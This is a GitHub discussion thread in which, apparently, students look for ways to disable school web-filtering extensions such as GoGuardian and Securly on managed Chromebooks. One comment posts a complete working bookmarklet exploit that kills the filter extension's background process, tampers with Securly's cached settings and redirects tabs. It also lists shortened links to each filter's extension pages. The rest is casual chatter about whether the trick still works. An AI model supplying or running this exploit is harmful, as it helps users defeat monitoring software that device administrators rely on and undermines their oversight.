### DISCUSSION TITLE
titanium network's method

### DISCUSSION THREAD

**Discussion by obkduishinijf** [3kh0/ext-remover#366] [Help JOIN TITANIUM NETWORK TO SHARE PLEASE] [answered]
brokey, what should i do? (this is for a friend who doesn't want to downgrade)

![Screenshot 2023-01-04 5 10 33 AM](https://user-images.githubusercontent.com/117109200/210543081-fc220687-4903-4ba7-b521-bf49aef7fcbe.png)

**Comment by Aka-but-nice** [comment]
yea reload

**Reply by Aka-but-nice** [reply]
also it might be, that goguardian updated their blocker which might have stopped it from it from working, if that's the case your kinda screwed, ill try to make another exploit, but I don't have GoGuardian so I can't relate to the problems,  but just try to reload.

**Reply by obkduishinijf** [reply]
> also it might be, that goguardian updated their blocker which might have stopped it from it from working, if that's the case your kinda screwed, ill try to make another exploit, but I don't have GoGuardian so I can't relate to the problems, but just try to reload.

reloading did nothing, probably updated the entire aspect that blocks stuff.

**Reply by Aka-but-nice** [reply]
also do you even have goguardian

**Reply by Aka-but-nice** [reply]
actually show me a vid of what happens

**Reply by obkduishinijf** [reply]
> actually show me a vid of what happens

[Screen recording 2023-01-04 9.15.43 AM.webm](https://user-images.githubusercontent.com/117109200/210587423-7feebd32-575a-4647-bcc0-7e4bc77ec1f6.webm)

**Comment by Aka-but-nice** [comment]
yea

**Comment by Aka-but-nice** [comment]
Ok this whatcha do

**Comment by Aka-but-nice** [comment]
now, this might break the page but bookmark this code javascript:function aboutBlankPage(n){opener.chrome.tabs.query({url:n},(n=>{opener.chrome.tabs.update(n[0].id,{url:"about:blank"})}))}function get(n){return window.document.getElementById(n)}doc=window.document,doc.write("\n<html>\n<style>\nhtml, body {\n  height: 100%;\n  width: 100%;\n}\nh1,p {\nfont-family: system-ui,-apple-system,system-ui,\"Helvetica Neue\",Helvetica,Arial,sans-serif;\n}\np {\nfont-size: 16;\n}\nbutton {\n  align-items: center;\n  background-color: #FFFFFF;\n%20%20border:%201px%20solid%20rgba(0,%200,%200,%200.1);\n%20%20border-radius:%20.25rem;\n%20%20box-shadow:%20rgba(0,%200,%200,%200.02)%200%201px%203px%200;\n%20%20box-sizing:%20border-box;\n%20%20color:%20rgba(0,%200,%200,%200.85);\n%20%20cursor:%20pointer;\n%20%20display:%20inline-flex;\n%20%20font-family:%20system-ui,-apple-system,system-ui,\%22Helvetica%20Neue\%22,Helvetica,Arial,sans-serif;\n%20%20font-size:%2016px;\n%20%20font-weight:%20600;\n%20%20justify-content:%20center;\n%20%20line-height:%201.25;\n%20%20margin:%200;\n%20%20min-height:%203rem;\n%20%20padding:%20calc(.875rem%20-%201px)%20calc(1.5rem%20-%201px);\n%20%20position:%20relative;\n%20%20text-decoration:%20none;\n%20%20transition:%20all%20250ms;\n%20%20user-select:%20none;\n%20%20-webkit-user-select:%20none;\n%20%20touch-action:%20manipulation;\n%20%20vertical-align:%20baseline;\n%20%20width:%20auto;\n}\n\nbutton:hover,\nbutton:focus%20{\n%20%20border-color:%20rgba(0,%200,%200,%200.15);\n%20%20box-shadow:%20rgba(0,%200,%200,%200.1)%200%204px%2012px;\n%20%20color:%20rgba(0,%200,%200,%200.65);\n}\n\nbutton:hover%20{\n%20%20transform:%20translateY(-1px);\n}\n\nbutton:active%20{\n%20%20background-color:%20#F0F0F1;\n%20%20border-color:%20rgba(0,%200,%200,%200.15);\n%20%20box-shadow:%20rgba(0,%200,%200,%200.06)%200%202px%204px;\n%20%20color:%20rgba(0,%200,%200,%200.65);\n%20%20transform:%20translateY(0);\n}\ninput%20{\nheight:16;\nborder:%200;\n%20%20border-bottom:%202px%20solid%20#9b9b9b;\n%20%20outline:%200;\n}\n#opener%20{\ncursor:%20pointer;\n}\n#links%20{\ndisplay:%20none;\n}\n%3C/style%3E\n%3Cbody%3E\n%3Ch1%3EPoint%20Blank%20Swap%20Launcher%3C/h1%3E\n%3Cp%3EThis%20must%20be%20ran%20on%20an%20extension%20about:blank%20page%3C/p%3E\n%3Cp%20id='opener'%3ENeed%20the%20links?%20Click%20here%3C/p%3E\n%3Cdiv%20id='links'%3E\n%3Cp%3E%20List%20of%20links%20below%20%3Cbr%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofguardian'%3Egoguardian%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofcurly'%3Esecurly%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofumbrella'%3Ecisco%20umbrella%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofsi'%3Eblocksi%3C/a%3E%3Cbr%3E\n%3Ca%20href='https://tinyurl.com/goofboss'%3Eiboss%3C/a%3E%3Cbr%3E\n%3C/p%3E\n%3C/div%3E\n%3Cbutton%20id='kill'%3EKill%20extension%20by%20killing%20process%3C/button%3E\n%3Cbutton%20id='cachekill'%3E[Securly%20only]%20Confuse%20by%20overwriting%20cache%3C/button%3E\n%3Cp%3EChange%20tabs%20with%20url%20to%20about:blank%20(make%20sure%20you%20know%20how%20to%20use%20this)%3C/p%3E\n%3Cinput%20id='url'%3E\n%3Cbutton%20id='change'%3EChange%20tabs%3C/button%3E\n%3Cp%20id='error'%3E%3C/p%3E\n%3Cbr%3E\n%3Cp%3E%3Ci%3EExpoit%20made%20by%20SprinkzMC#8421,%20Launcher%20made%20by%20NitrogenDioxide#2553%3C/i%3E%3C/p%3E\n%3C/body%3E\n%3C/html%3E\n%22),get(%22kill%22).addEventListener(%22click%22,(function(){opener.chrome.extension.getBackgroundPage().close(),alert(%22Killed%20background%20process%22)}),!1),get(%22change%22).addEventListener(%22click%22,(function(){aboutBlankPage(get(%22url%22).value)}),!1),get(%22cachekill%22).addEventListener(%22click%22,(function(){localStorage.cluster=%22UNKNOWN_SCHOOL,999999999999999999999999999%22,alert(%22Cache%20changed%22)}),!1),get(%22opener%22).addEventListener(%22click%22,(function(){const%20n=get(%22links%22);%22none%22!==n.style.display&&%22%22!=n.style.display?n.style.display=%22none%22:n.style.display=%22block%22}),!1);                                                                               and follow the steps here on out

**Comment by Aka-but-nice** [comment, marked as answer]
well, first of all the link tinyurl.com/goofguardian doesn't work, because goguardian updated their blocker, so your screwed, until pingot comes out, which will probably be in estimated: 10 years

**Reply by obkduishinijf** [reply]
damn.

**Reply by 3kh0** [reply]
JUst saying pingot is not happening, it is just a way to get attention.

**Reply by obkduishinijf** [reply]
d

**Reply by Aka-but-nice** [reply]
true

**Reply by troycla** [reply]
bro i have 2 year of school lift

**Reply by obkduishinijf** [reply]
> bro i have 2 year of school lift

are you having a stroke

**Reply by troycla** [reply]
bro the code bug use and accept perm chashing coputer

**Reply by Aka-but-nice** [reply]
> bro the code bug use and accept perm chashing coputer

BRO SPEAK NORMALLY STOP SPEAKING SHADOW REALM
